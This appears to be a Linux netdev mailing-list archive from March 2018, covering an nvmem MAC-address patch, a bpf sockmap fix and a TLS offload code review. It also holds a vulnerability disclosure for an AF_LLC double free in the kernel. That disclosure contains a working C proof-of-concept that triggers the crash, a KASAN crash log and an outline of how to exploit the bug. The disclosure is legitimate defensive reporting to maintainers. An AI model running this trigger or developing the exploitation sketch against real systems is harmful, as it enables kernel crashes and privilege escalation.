+	if (len < 6 || !is_valid_ether_addr(mac)) {
+		ret = -EINVAL;
+	} else {
+		ether_addr_copy(addr, mac);
+		ret = 0;
+	}
+
+	kfree(mac);
+
+	return ret;
+}
+EXPORT_SYMBOL(of_get_nvmem_mac_address);
diff --git a/include/linux/of_net.h b/include/linux/of_net.h
index 9cd72aa..90d81ee 100644
--- a/include/linux/of_net.h
+++ b/include/linux/of_net.h
@@ -13,6 +13,7 @@
 struct net_device;
 extern int of_get_phy_mode(struct device_node *np);
 extern const void *of_get_mac_address(struct device_node *np);
+extern int of_get_nvmem_mac_address(struct device_node *np, void *addr);
 extern struct net_device *of_find_net_device_by_node(struct device_node *np);
 #else
 static inline int of_get_phy_mode(struct device_node *np)
@@ -25,6 +26,11 @@ static inline const void *of_get_mac_address(struct device_node *np)
 	return NULL;
 }
 
+static inline int of_get_nvmem_mac_address(struct device_node *np, void *addr)
+{
+	return -ENODEV;
+}
+
 static inline struct net_device *of_find_net_device_by_node(struct device_node *np)
 {
 	return NULL;
-- 
1.9.1

^ permalink raw reply related

* Security Vulnerability in AF_LLC (Double Free)
From: Noam Rathaus @ 2018-03-26  6:43 UTC (permalink / raw)
  To: netdev

Hi,

We would like to report a security vulnerability in AF_LLC.

The credit should be given as such:
"An independent security researcher has reported this vulnerability to
Beyond Security’s SecuriTeam Secure Disclosure program."

==
# AF_LLC DOUBLE FREE

## affected versions
The bug seems to be present in the Linux kernel from the latest
version to 2.6.39.4 and even earlier versions.

## summary
LLC sockets can only be created with CAP_NET_RAW capability.
Setsockopt() with SO_BINDTODEVICE is necessary to setup
sk->sk_bound_dev_if so that bind() won't fail as well as
llc_ui_sendmsg() when checking that llc->addr is initialized.

Then after connecting and sending a message, the code leads to
llc_build_and_send_pkt.

The error can be spotted in llc_conn_state_process():

```
...
out_kfree_skb:
kfree_skb(skb);
out_skb_put:
kfree_skb(skb);
return rc;
}
```

The end of the function see 2 consecutive free on the skb which causes
a UAF first followed by a double free as seen in the crash log:

```
void kfree_skb(struct sk_buff *skb)
{
if (!skb_unref(skb))
return;

trace_kfree_skb(skb, __builtin_return_address(0));
__kfree_skb(skb);
}
```


Exploiting the double free on the struct sk_buff itself is not easy
due to that fact that it belongs to its own slab. However, a sk_buff
has a kmalloc-ed buffer which is allocated and deallocated side by
side with it (cf. https://xairy.github.io/blog/2016/cve-2016-2384).
It's kind of similar to 2 consecutive double free.

We want to target the 2nd free to free any other object with function
pointers (in the general kmalloc) so that we can abuse the crafted
UAF. A good target could be to free a skb's buffer and control the
destructor_arg in skb_shared_info just like the writeup in the above
link.

## POC

```
#define _GNU_SOURCE
#include <endian.h>
#include <sys/syscall.h>
#include <unistd.h>
#include <errno.h>
#include <sched.h>
#include <signal.h>
#include <stdarg.h>
#include <stdbool.h>
#include <stdio.h>
#include <sys/prctl.h>
#include <sys/resource.h>
#include <sys/time.h>
#include <sys/wait.h>
#include <stdint.h>
#include <string.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <sys/socket.h>

struct sockaddr_llc {
short  sllc_family;
short  sllc_arphrd;
unsigned char   sllc_test;
unsigned char   sllc_xid;
unsigned char sllc_ua;
unsigned char   sllc_sap;
unsigned char   sllc_mac[6];
unsigned char   __pad[2];
};

void test()
{
int fd = socket(AF_LLC, SOCK_STREAM, 0);
char output[32] = "lo";
socklen_t len;
setsockopt(fd, SOL_SOCKET, SO_BINDTODEVICE, &output, 0x10);
struct sockaddr_llc addr1 = {.sllc_family = AF_LLC, .sllc_sap = 2};
bind(fd, (const struct sockaddr *)&addr1, sizeof(struct sockaddr_llc));
struct sockaddr_llc addr2 = {.sllc_family = AF_LLC, .sllc_sap = 2};
connect(fd, (const struct sockaddr *)&addr2, sizeof(struct sockaddr_llc));

char msg[0x10] = "aaaa";
send(fd, msg, 0x10, 0);
}

int main()
{
test();
return 0;
}
```

## crash log

```
[   23.142123] BUG: KASAN: use-after-free in kfree_skb+0x298/0x2f0
[   23.143012] Read of size 4 at addr ffff8801093d1124 by task poc/207
[   23.143742]
[   23.143892] CPU: 0 PID: 207 Comm: poc Not tainted 4.15.0+ #5
[   23.144396] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996),
BIOS rel-1.11.0-0-g63451fca13-prebuilt.qemu-project.org 04/01/2014
[   23.145452] Call Trace:
[   23.145694]  dump_stack+0xcc/0x16c
[   23.147098]  print_address_description+0x73/0x290
[   23.147534]  kasan_report+0x277/0x360
[   23.148204]  kfree_skb+0x298/0x2f0
[   23.149829]  llc_conn_state_process+0x12d/0x1260
[   23.150536]  llc_build_and_send_pkt+0x195/0x240
[   23.151135]  llc_ui_sendmsg+0x78b/0x1280
[   23.155716]  sock_sendmsg+0xc5/0x100
[   23.156413]  SYSC_sendto+0x33a/0x580
[   23.163517]  entry_SYSCALL_64_fastpath+0x24/0x87
[   23.164241] RIP: 0033:0x400cfd
[   23.164694] RSP: 002b:00007ffd3d1f4bd8 EFLAGS: 00000246
[   23.164698]
[   23.165766] Allocated by task 207:
[   23.166397]  kasan_kmalloc+0xa0/0xd0
[   23.167071]  kmem_cache_alloc_node+0x100/0x1c0
[   23.167829]  __alloc_skb+0xe2/0x700
[   23.168457]  alloc_skb_with_frags+0x10a/0x690
[   23.169174]  sock_alloc_send_pskb+0x735/0x920
[   23.170156]  llc_ui_sendmsg+0x427/0x1280
[   23.170960]  sock_sendmsg+0xc5/0x100
[   23.171547]  SYSC_sendto+0x33a/0x580
[   23.172280]  entry_SYSCALL_64_fastpath+0x24/0x87
[   23.173460]
[   23.173763] Freed by task 207:
[   23.174261]  kasan_slab_free+0x71/0xc0
[   23.174843]  kmem_cache_free+0x77/0x1e0
[   23.175410]  kfree_skbmem+0x1a1/0x1d0
[   23.175987]  kfree_skb+0x12f/0x2f0
[   23.176541]  llc_conn_state_process+0x120/0x1260
[   23.177406]  llc_build_and_send_pkt+0x195/0x240
[   23.178051]  llc_ui_sendmsg+0x78b/0x1280
[   23.178647]  sock_sendmsg+0xc5/0x100
[   23.179175]  SYSC_sendto+0x33a/0x580
[   23.179702]  entry_SYSCALL_64_fastpath+0x24/0x87
[   23.180368]
[   23.180603] The buggy address belongs to the object at ffff8801093d1040
[   23.180603]  which belongs to the cache skbuff_head_cache of size 232
[   23.182503] The buggy address is located 228 bytes inside of
[   23.182503]  232-byte region [ffff8801093d1040, ffff8801093d1128)
[   23.184255] The buggy address belongs to the page:
[   23.184976] page:ffffea000424f400 count:1 mapcount:0 mapping:
   (null) index:0x0 compound_mapcount: 0
[   23.186602] flags: 0x17ffffc0008100(slab|head)
[   23.187722] raw: 0017ffffc0008100 0000000000000000 0000000000000000
0000000180190019
[   23.188919] raw: dead000000000100 dead000000000200 ffff88010dee2540
0000000000000000
[   23.189891] page dumped because: kasan: bad access detected
[   23.190587]
[   23.190788] Memory state around the buggy address:
[   23.191394]  ffff8801093d1000: fc fc fc fc fc fc fc fc fb fb fb fb
fb fb fb fb
[   23.192300]  ffff8801093d1080: fb fb fb fb fb fb fb fb fb fb fb fb
fb fb fb fb
[   23.193238] >ffff8801093d1100: fb fb fb fb fb fc fc fc fc fc fc fc
fc fc fc fc
[   23.194352]                                ^
[   23.195089]  ffff8801093d1180: fb fb fb fb fb fb fb fb fb fb fb fb
fb fb fb fb
[   23.196254]  ffff8801093d1200: fb fb fb fb fb fb fb fb fb fb fb fb
fb fc fc fc
[   23.197271] ==================================================================
[   23.198327] Disabling lock debugging due to kernel taint
[   23.199108] ==================================================================
[   23.200025] BUG: KASAN: double-free or invalid-free in           (null)
[   23.200816]
[   23.201047] CPU: 0 PID: 207 Comm: poc Tainted: G    B            4.15.0+ #5
[   23.202212] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996),
BIOS rel-1.11.0-0-g63451fca13-prebuilt.qemu-project.org 04/01/2014
[   23.203921] Call Trace:
[   23.204323]  dump_stack+0xcc/0x16c
[   23.206271]  print_address_description+0x73/0x290
[   23.207700]  kasan_report_double_free+0x65/0xa0
[   23.208432]  kasan_slab_free+0xa3/0xc0
[   23.209650]  kmem_cache_free+0x77/0x1e0
[   23.210278]  kfree_skbmem+0x1a1/0x1d0
[   23.211509]  kfree_skb+0x12f/0x2f0
[   23.214089]  llc_conn_state_process+0x12d/0x1260
[   23.215088]  llc_build_and_send_pkt+0x195/0x240
[   23.215810]  llc_ui_sendmsg+0x78b/0x1280
[   23.220486]  sock_sendmsg+0xc5/0x100
[   23.221045]  SYSC_sendto+0x33a/0x580
[   23.227676]  entry_SYSCALL_64_fastpath+0x24/0x87
[   23.228398] RIP: 0033:0x400cfd
[   23.228892] RSP: 002b:00007ffd3d1f4bd8 EFLAGS: 00000246
[   23.228896]
[   23.229966] Allocated by task 207:
[   23.230538]  kasan_kmalloc+0xa0/0xd0
[   23.231112]  kmem_cache_alloc_node+0x100/0x1c0
[   23.231824]  __alloc_skb+0xe2/0x700
[   23.232395]  alloc_skb_with_frags+0x10a/0x690
[   23.233118]  sock_alloc_send_pskb+0x735/0x920
[   23.233838]  llc_ui_sendmsg+0x427/0x1280
[   23.234434]  sock_sendmsg+0xc5/0x100
[   23.234947]  SYSC_sendto+0x33a/0x580
[   23.235414]  entry_SYSCALL_64_fastpath+0x24/0x87
[   23.236088]
[   23.236348] Freed by task 207:
[   23.236774]  kasan_slab_free+0x71/0xc0
[   23.237242]  kmem_cache_free+0x77/0x1e0
[   23.237740]  kfree_skbmem+0x1a1/0x1d0
[   23.238202]  kfree_skb+0x12f/0x2f0
[   23.238698]  llc_conn_state_process+0x120/0x1260
[   23.239435]  llc_build_and_send_pkt+0x195/0x240
[   23.240129]  llc_ui_sendmsg+0x78b/0x1280
[   23.240617]  sock_sendmsg+0xc5/0x100
[   23.241086]  SYSC_sendto+0x33a/0x580
[   23.241555]  entry_SYSCALL_64_fastpath+0x24/0x87
[   23.242230]
[   23.242450] The buggy address belongs to the object at ffff8801093d1040
[   23.242450]  which belongs to the cache skbuff_head_cache of size 232
[   23.244066] The buggy address is located 0 bytes inside of
[   23.244066]  232-byte region [ffff8801093d1040, ffff8801093d1128)
[   23.245810] The buggy address belongs to the page:
[   23.246425] page:ffffea000424f400 count:1 mapcount:0 mapping:
   (null) index:0x0 compound_mapcount: 0
[   23.247905] flags: 0x17ffffc0008100(slab|head)
[   23.248553] raw: 0017ffffc0008100 0000000000000000 0000000000000000
0000000180190019
[   23.249762] raw: dead000000000100 dead000000000200 ffff88010dee2540
0000000000000000
[   23.250949] page dumped because: kasan: bad access detected
[   23.251809]
[   23.252037] Memory state around the buggy address:
[   23.252782]  ffff8801093d0f00: fc fc fc fc fc fc fc fc fc fc fc fc
fc fc fc fc
[   23.253731]  ffff8801093d0f80: fc fc fc fc fc fc fc fc fc fc fc fc
fc fc fc fc
[   23.254660] >ffff8801093d1000: fc fc fc fc fc fc fc fc fb fb fb fb
fb fb fb fb
[   23.255585]                                            ^
[   23.256273]  ffff8801093d1080: fb fb fb fb fb fb fb fb fb fb fb fb
fb fb fb fb
[   23.257274]  ffff8801093d1100: fb fb fb fb fb fc fc fc fc fc fc fc
fc fc fc fc
[   23.258614] ==================================================================
```
==

-- 

Thanks,
Noam Rathaus
Beyond Security

PGP Key ID: 7EF920D3C045D63F (Exp 2019-03)

^ permalink raw reply

* Re: [PATCH] of_net: Implement of_get_nvmem_mac_address helper
From: Mike Looijmans @ 2018-03-26  6:54 UTC (permalink / raw)
  To: Andrew Lunn
  Cc: Florian Fainelli, netdev, linux-kernel, devicetree, robh+dt,
	frowand.list
In-Reply-To: <d2dfee96-cd30-fa16-6c83-b55773e3aa91@topic.nl>

On 25-03-18 10:17, Mike Looijmans wrote:
> On 24-03-18 19:53, Andrew Lunn wrote:
>>> A quick survey for the of_get_mac_address users learns that most of them do
>>> a memcpy (or similar) right after it, so for these drivers the
>>> "of_get_nvmem_mac_address" style signature that performs the memcpy (or
>>> better, ether_addr_copy) is a better fit, e.g.:
>>>
>>> int of_get_mac_address(struct device_node *np, void *addr)
>>
>> Hi Mike
>>
>> This is a nicer solution, but it is quite a lot of work, there are a
>> lot of users. Maybe Coccinelle can help?
> 
> About 58 of them, yeah. And this looked like such a simple thing when I 
> started it...
> https://elixir.bootlin.com/linux/v4.16-rc6/ident/of_get_mac_address
> I have no experience with Coccinelle though.
> 

I'll at least post a v2 patch with what we've discussed so far.

Another thing that just occurred to me is that the nvmem interface would also 
allow a MAC address to be written to NV storage. Haven't looked at that path, 
but it would be nice to be able to permanently program the MAC address using 
standard interfaces.


Kind regards,

Mike Looijmans
System Expert

TOPIC Products
Materiaalweg 4, NL-5681 RJ Best
Postbus 440, NL-5680 AK Best
Telefoon: +31 (0) 499 33 69 79
E-mail: mike.looijmans@topicproducts.com
Website: www.topicproducts.com

Please consider the environment before printing this e-mail

^ permalink raw reply

* [PATCH bpf-next] bpf: sockmap: initialize sg table entries properly
From: Prashant Bhole @ 2018-03-26  6:54 UTC (permalink / raw)
  To: Daniel Borkmann, Alexei Starovoitov, David S . Miller
  Cc: Prashant Bhole, John Fastabend, netdev

When CONFIG_DEBUG_SG is set, sg->sg_magic is initialized to SG_MAGIC,
when sg table is initialized using sg_init_table(). Magic is checked
while navigating the scatterlist. We hit BUG_ON when magic check is
failed.

Fixed following things:
- Initialization of sg table in bpf_tcp_sendpage() was missing,
  initialized it using sg_init_table()

- bpf_tcp_sendmsg() initializes sg table using sg_init_table() before
  entering the loop, but further consumed sg entries are initialized
  using memset. Fixed it by replacing memset with sg_init_table() in
  function bpf_tcp_push()

Signed-off-by: Prashant Bhole <bhole_prashant_q7@lab.ntt.co.jp>
---
 kernel/bpf/sockmap.c | 11 +++++++----
 1 file changed, 7 insertions(+), 4 deletions(-)

diff --git a/kernel/bpf/sockmap.c b/kernel/bpf/sockmap.c
index 69c5bccabd22..8a848a99d768 100644
--- a/kernel/bpf/sockmap.c
+++ b/kernel/bpf/sockmap.c
@@ -312,7 +312,7 @@ static int bpf_tcp_push(struct sock *sk, int apply_bytes,
 			md->sg_start++;
 			if (md->sg_start == MAX_SKB_FRAGS)
 				md->sg_start = 0;
-			memset(sg, 0, sizeof(*sg));
+			sg_init_table(sg, 1);
 
 			if (md->sg_start == md->sg_end)
 				break;
@@ -763,10 +763,14 @@ static int bpf_tcp_sendpage(struct sock *sk, struct page *page,
 
 	lock_sock(sk);
 
-	if (psock->cork_bytes)
+	if (psock->cork_bytes) {
 		m = psock->cork;
-	else
+		sg = &m->sg_data[m->sg_end];
+	} else {
 		m = &md;
+		sg = m->sg_data;
+		sg_init_table(sg, MAX_SKB_FRAGS);
+	}
 
 	/* Catch case where ring is full and sendpage is stalled. */
 	if (unlikely(m->sg_end == m->sg_start &&
@@ -774,7 +778,6 @@ static int bpf_tcp_sendpage(struct sock *sk, struct page *page,
 		goto out_err;
 
 	psock->sg_size += size;
-	sg = &m->sg_data[m->sg_end];
 	sg_set_page(sg, page, size, offset);
 	get_page(page);
 	m->sg_copy[m->sg_end] = true;
-- 
2.14.3

^ permalink raw reply related

* Re: [PATCH V3 net-next 06/14] net/tls: Add generic NIC offload infrastructure
From: Boris Pismenny @ 2018-03-26  7:10 UTC (permalink / raw)
  To: Shannon Nelson, Saeed Mahameed, David S. Miller
  Cc: netdev, Dave Watson, Ilya Lesokhin, Aviad Yehezkel
In-Reply-To: <c7769f3e-b19c-0e48-7245-c6dd46ecad49@oracle.com>

Hi Shannon,

On 3/23/2018 11:21 PM, Shannon Nelson wrote:
> On 3/22/2018 3:33 PM, Saeed Mahameed wrote:
>> From: Ilya Lesokhin <ilyal@mellanox.com>
>>
>> This patch adds a generic infrastructure to offload TLS crypto to a
>> network devices. It enables the kernel TLS socket to skip encryption
> 
> s/devices/device/
> 
>> and authentication operations on the transmit side of the data path.
>> Leaving those computationally expensive operations to the NIC.
>>
>> The NIC offload infrastructure builds TLS records and pushes them to
>> the TCP layer just like the SW KTLS implementation and using the same 
>> API.
>> TCP segmentation is mostly unaffected. Currently the only exception is
>> that we prevent mixed SKBs where only part of the payload requires
>> offload. In the future we are likely to add a similar restriction
>> following a change cipher spec record.
>>
>> The notable differences between SW KTLS and NIC offloaded TLS
>> implementations are as follows:
>> 1. The offloaded implementation builds "plaintext TLS record", those
>> records contain plaintext instead of ciphertext and place holder bytes
>> instead of authentication tags.
>> 2. The offloaded implementation maintains a mapping from TCP sequence
>> number to TLS records. Thus given a TCP SKB sent from a NIC offloaded
>> TLS socket, we can use the tls NIC offload infrastructure to obtain
>> enough context to encrypt the payload of the SKB.
>> A TLS record is released when the last byte of the record is ack'ed,
>> this is done through the new icsk_clean_acked callback.
>>
>> The infrastructure should be extendable to support various NIC offload
>> implementations.  However it is currently written with the
>> implementation below in mind:
>> The NIC assumes that packets from each offloaded stream are sent as
>> plaintext and in-order. It keeps track of the TLS records in the TCP
>> stream. When a packet marked for offload is transmitted, the NIC
>> encrypts the payload in-place and puts authentication tags in the
>> relevant place holders.
>>
>> The responsibility for handling out-of-order packets (i.e. TCP
>> retransmission, qdisc drops) falls on the netdev driver.
>>
>> The netdev driver keeps track of the expected TCP SN from the NIC's
>> perspective.  If the next packet to transmit matches the expected TCP
>> SN, the driver advances the expected TCP SN, and transmits the packet
>> with TLS offload indication.
>>
>> If the next packet to transmit does not match the expected TCP SN. The
>> driver calls the TLS layer to obtain the TLS record that includes the
>> TCP of the packet for transmission. Using this TLS record, the driver
>> posts a work entry on the transmit queue to reconstruct the NIC TLS
>> state required for the offload of the out-of-order packet. It updates
>> the expected TCP SN accordingly and transmit the now in-order packet.
> 
> s/transmit/transmits/
> 
>> The same queue is used for packet transmission and TLS context
>> reconstruction to avoid the need for flushing the transmit queue before
>> issuing the context reconstruction request.
>>
>> Signed-off-by: Ilya Lesokhin <ilyal@mellanox.com>
>> Signed-off-by: Boris Pismenny <borisp@mellanox.com>
>> Signed-off-by: Aviad Yehezkel <aviadye@mellanox.com>
>> Signed-off-by: Saeed Mahameed <saeedm@mellanox.com>
>> ---
>>   include/net/tls.h             |  73 +++-
>>   net/tls/Kconfig               |  10 +
>>   net/tls/Makefile              |   2 +
>>   net/tls/tls_device.c          | 756 
>> ++++++++++++++++++++++++++++++++++++++++++
>>   net/tls/tls_device_fallback.c | 412 +++++++++++++++++++++++
>>   net/tls/tls_main.c            |  33 +-
>>   6 files changed, 1279 insertions(+), 7 deletions(-)
>>   create mode 100644 net/tls/tls_device.c
>>   create mode 100644 net/tls/tls_device_fallback.c
>>
>> diff --git a/include/net/tls.h b/include/net/tls.h
>> index 4913430ab807..4f6a6f98d62b 100644
>> --- a/include/net/tls.h
>> +++ b/include/net/tls.h
>> @@ -77,6 +77,37 @@ struct tls_sw_context {
>>       struct scatterlist sg_aead_out[2];
>>   };
>> +struct tls_record_info {
>> +    struct list_head list;
>> +    u32 end_seq;
>> +    int len;
>> +    int num_frags;
>> +    skb_frag_t frags[MAX_SKB_FRAGS];
>> +};
>> +
>> +struct tls_offload_context {
>> +    struct crypto_aead *aead_send;
>> +    spinlock_t lock;    /* protects records list */
>> +    struct list_head records_list;
>> +    struct tls_record_info *open_record;
>> +    struct tls_record_info *retransmit_hint;
>> +    u64 hint_record_sn;
>> +    u64 unacked_record_sn;
>> +
>> +    struct scatterlist sg_tx_data[MAX_SKB_FRAGS];
>> +    void (*sk_destruct)(struct sock *sk);
>> +    u8 driver_state[];
>> +    /* The TLS layer reserves room for driver specific state
>> +     * Currently the belief is that there is not enough
>> +     * driver specific state to justify another layer of indirection
>> +     */
>> +#define TLS_DRIVER_STATE_SIZE (max_t(size_t, 8, sizeof(void *)))
>> +};
>> +
>> +#define 
>> TLS_OFFLOAD_CONTEXT_SIZE                                               \
>> +    (ALIGN(sizeof(struct tls_offload_context), sizeof(void *)) 
>> +           \
>> +     TLS_DRIVER_STATE_SIZE)
>> +
>>   enum {
>>       TLS_PENDING_CLOSED_RECORD
>>   };
>> @@ -87,6 +118,10 @@ struct tls_context {
>>           struct tls12_crypto_info_aes_gcm_128 crypto_send_aes_gcm_128;
>>       };
>> +    struct list_head list;
>> +    struct net_device *netdev;
>> +    refcount_t refcount;
>> +
>>       void *priv_ctx;
>>       u8 tx_conf:2;
>> @@ -131,9 +166,28 @@ int tls_sw_sendpage(struct sock *sk, struct page 
>> *page,
>>   void tls_sw_close(struct sock *sk, long timeout);
>>   void tls_sw_free_tx_resources(struct sock *sk);
>> -void tls_sk_destruct(struct sock *sk, struct tls_context *ctx);
>> -void tls_icsk_clean_acked(struct sock *sk);
>> +int tls_set_device_offload(struct sock *sk, struct tls_context *ctx);
>> +int tls_device_sendmsg(struct sock *sk, struct msghdr *msg, size_t 
>> size);
>> +int tls_device_sendpage(struct sock *sk, struct page *page,
>> +            int offset, size_t size, int flags);
>> +void tls_device_sk_destruct(struct sock *sk);
>> +void tls_device_init(void);
>> +void tls_device_cleanup(void);
>> +
>> +struct tls_record_info *tls_get_record(struct tls_offload_context 
>> *context,
>> +                       u32 seq, u64 *p_record_sn);
>> +
>> +static inline bool tls_record_is_start_marker(struct tls_record_info 
>> *rec)
>> +{
>> +    return rec->len == 0;
>> +}
>> +
>> +static inline u32 tls_record_start_seq(struct tls_record_info *rec)
>> +{
>> +    return rec->end_seq - rec->len;
>> +}
>> +void tls_sk_destruct(struct sock *sk, struct tls_context *ctx);
>>   int tls_push_sg(struct sock *sk, struct tls_context *ctx,
>>           struct scatterlist *sg, u16 first_offset,
>>           int flags);
>> @@ -170,6 +224,13 @@ static inline bool 
>> tls_is_pending_open_record(struct tls_context *tls_ctx)
>>       return tls_ctx->pending_open_record_frags;
>>   }
>> +static inline bool tls_is_sk_tx_device_offloaded(struct sock *sk)
>> +{
>> +    return sk_fullsock(sk) &&
>> +           /* matches smp_store_release in tls_set_device_offload */
>> +           smp_load_acquire(&sk->sk_destruct) == 
>> &tls_device_sk_destruct;
>> +}
>> +
>>   static inline void tls_err_abort(struct sock *sk)
>>   {
>>       sk->sk_err = EBADMSG;
>> @@ -257,4 +318,12 @@ static inline struct tls_offload_context 
>> *tls_offload_ctx(
>>   int tls_proccess_cmsg(struct sock *sk, struct msghdr *msg,
>>                 unsigned char *record_type);
>> +struct sk_buff *tls_validate_xmit_skb(struct sock *sk,
>> +                      struct net_device *dev,
>> +                      struct sk_buff *skb);
>> +
>> +int tls_sw_fallback_init(struct sock *sk,
>> +             struct tls_offload_context *offload_ctx,
>> +             struct tls_crypto_info *crypto_info);
>> +
>>   #endif /* _TLS_OFFLOAD_H */
>> diff --git a/net/tls/Kconfig b/net/tls/Kconfig
>> index eb583038c67e..9d3ef820bb16 100644
>> --- a/net/tls/Kconfig
>> +++ b/net/tls/Kconfig
>> @@ -13,3 +13,13 @@ config TLS
>>       encryption handling of the TLS protocol to be done in-kernel.
>>       If unsure, say N.
>> +
>> +config TLS_DEVICE
>> +    bool "Transport Layer Security HW offload"
>> +    depends on TLS
>> +    select SOCK_VALIDATE_XMIT
>> +    default n
>> +    ---help---
>> +    Enable kernel support for HW offload of the TLS protocol.
>> +
>> +    If unsure, say N.
>> diff --git a/net/tls/Makefile b/net/tls/Makefile
>> index a930fd1c4f7b..4d6b728a67d0 100644
>> --- a/net/tls/Makefile
>> +++ b/net/tls/Makefile
>> @@ -5,3 +5,5 @@
>>   obj-$(CONFIG_TLS) += tls.o
>>   tls-y := tls_main.o tls_sw.o
>> +
>> +tls-$(CONFIG_TLS_DEVICE) += tls_device.o tls_device_fallback.o
>> diff --git a/net/tls/tls_device.c b/net/tls/tls_device.c
>> new file mode 100644
>> index 000000000000..34555ac0b959
>> --- /dev/null
>> +++ b/net/tls/tls_device.c
>> @@ -0,0 +1,756 @@
>> +/* Copyright (c) 2018, Mellanox Technologies All rights reserved.
> 
> Maybe add the appropriate SPDX tag to the top of this new file?
> 
Let's do it in a single patch for all net/tls/*


>> + *
>> + * This software is available to you under a choice of one of two
>> + * licenses.  You may choose to be licensed under the terms of the GNU
>> + * General Public License (GPL) Version 2, available from the file
>> + * COPYING in the main directory of this source tree, or the
>> + * OpenIB.org BSD license below:
>> + *
>> + *     Redistribution and use in source and binary forms, with or
>> + *     without modification, are permitted provided that the following
>> + *     conditions are met:
>> + *
>> + *      - Redistributions of source code must retain the above
>> + *        copyright notice, this list of conditions and the following
>> + *        disclaimer.
>> + *
>> + *      - Redistributions in binary form must reproduce the above
>> + *        copyright notice, this list of conditions and the following
>> + *        disclaimer in the documentation and/or other materials
>> + *        provided with the distribution.
>> + *
>> + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
>> + * EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
>> + * MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
>> + * NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
>> + * BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
>> + * ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
>> + * CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
>> + * SOFTWARE.
>> + */
>> +
>> +#include <linux/module.h>
>> +#include <net/tcp.h>
>> +#include <net/inet_common.h>
>> +#include <linux/highmem.h>
>> +#include <linux/netdevice.h>
>> +
>> +#include <net/tls.h>
>> +#include <crypto/aead.h>
>> +
>> +/* device_offload_lock is used to synchronize tls_dev_add
>> + * against NETDEV_DOWN notifications.
>> + */
>> +static DECLARE_RWSEM(device_offload_lock);
>> +
>> +static void tls_device_gc_task(struct work_struct *work);
>> +
>> +static DECLARE_WORK(tls_device_gc_work, tls_device_gc_task);
>> +static LIST_HEAD(tls_device_gc_list);
>> +static LIST_HEAD(tls_device_list);
>> +static DEFINE_SPINLOCK(tls_device_lock);
>> +
>> +static void tls_device_free_ctx(struct tls_context *ctx)
>> +{
>> +    struct tls_offload_context *offlad_ctx = tls_offload_ctx(ctx);
>> +
>> +    kfree(offlad_ctx);
> 
> Don't misspell a variable name, please either use something like 
> offload_ctx or shortened to olc.
> 

Sure.

>> +    kfree(ctx);
>> +}
>> +
>> +static void tls_device_gc_task(struct work_struct *work)
>> +{
>> +    struct tls_context *ctx, *tmp;
>> +    unsigned long flags;
>> +    LIST_HEAD(gc_list);
>> +
>> +
> 
> Drop the extra blank line
> 

Sure.

>> +    spin_lock_irqsave(&tls_device_lock, flags);
>> +    list_splice_init(&tls_device_gc_list, &gc_list);
>> +    spin_unlock_irqrestore(&tls_device_lock, flags);
>> +
>> +    list_for_each_entry_safe(ctx, tmp, &gc_list, list) {
>> +        struct net_device *netdev = ctx->netdev;
>> +
>> +        if (netdev) {
>> +            netdev->tlsdev_ops->tls_dev_del(netdev, ctx,
>> +                            TLS_OFFLOAD_CTX_DIR_TX);
> 
> Perhaps it will be clear in later code, but are you guaranteed there are 
> good ops and function pointers here, or should there be a check like in 
> many API calls like this?  Maybe
>          if (netdev) {
>              if (netdev->tlsdev_ops &&
>                  netdev->tlsdev_ops->tls_dev_del)
> 
> 

We try to catch the bad API during the netdev FEAT_CHANGE/REGISTER events.

>> +            dev_put(netdev);
>> +        }
>> +
>> +        list_del(&ctx->list);
>> +        tls_device_free_ctx(ctx);
>> +    }
>> +}
>> +
>> +static void tls_device_queue_ctx_destruction(struct tls_context *ctx)
>> +{
>> +    unsigned long flags;
>> +
>> +    spin_lock_irqsave(&tls_device_lock, flags);
>> +    list_move_tail(&ctx->list, &tls_device_gc_list);
>> +
>> +    /* schedule_work inside the spinlock
>> +     * to make sure tls_device_down waits for that work.
>> +     */
>> +    schedule_work(&tls_device_gc_work);
>> +
>> +    spin_unlock_irqrestore(&tls_device_lock, flags);
>> +}
>> +
>> +/* We assume that the socket is already connected */
>> +static struct net_device *get_netdev_for_sock(struct sock *sk)
>> +{
>> +    struct inet_sock *inet = inet_sk(sk);
>> +    struct net_device *netdev = NULL;
> 
> This initialization is unnecessary;
> 
>> +
>> +    netdev = dev_get_by_index(sock_net(sk), inet->cork.fl.flowi_oif);
>> +
>> +    return netdev;
>> +}
>> +
>> +static void destroy_record(struct tls_record_info *record)
>> +{
>> +    int nr_frags = record->num_frags;
>> +    skb_frag_t *frag;
>> +
>> +    while (nr_frags-- > 0) {
>> +        frag = &record->frags[nr_frags];
>> +        __skb_frag_unref(frag);
>> +    }
>> +    kfree(record);
>> +}
>> +
>> +static void delete_all_records(struct tls_offload_context *offload_ctx)
>> +{
>> +    struct tls_record_info *info, *temp;
>> +
>> +    list_for_each_entry_safe(info, temp, &offload_ctx->records_list, 
>> list) {
>> +        list_del(&info->list);
>> +        destroy_record(info);
>> +    }
>> +
>> +    offload_ctx->retransmit_hint = NULL;
>> +}
>> +
>> +static void tls_icsk_clean_acked(struct sock *sk, u32 acked_seq)
>> +{
>> +    struct tls_context *tls_ctx = tls_get_ctx(sk);
>> +    struct tls_record_info *info, *temp;
>> +    struct tls_offload_context *ctx;
>> +    u64 deleted_records = 0;
>> +    unsigned long flags;
>> +
>> +    if (!tls_ctx)
>> +        return;
>> +
>> +    ctx = tls_offload_ctx(tls_ctx);
>> +
>> +    spin_lock_irqsave(&ctx->lock, flags);
>> +    info = ctx->retransmit_hint;
>> +    if (info && !before(acked_seq, info->end_seq)) {
>> +        ctx->retransmit_hint = NULL;
>> +        list_del(&info->list);
>> +        destroy_record(info);
>> +        deleted_records++;
>> +    }
>> +
>> +    list_for_each_entry_safe(info, temp, &ctx->records_list, list) {
>> +        if (before(acked_seq, info->end_seq))
>> +            break;
>> +        list_del(&info->list);
>> +
>> +        destroy_record(info);
>> +        deleted_records++;
>> +    }
>> +
>> +    ctx->unacked_record_sn += deleted_records;
>> +    spin_unlock_irqrestore(&ctx->lock, flags);
>> +}
>> +
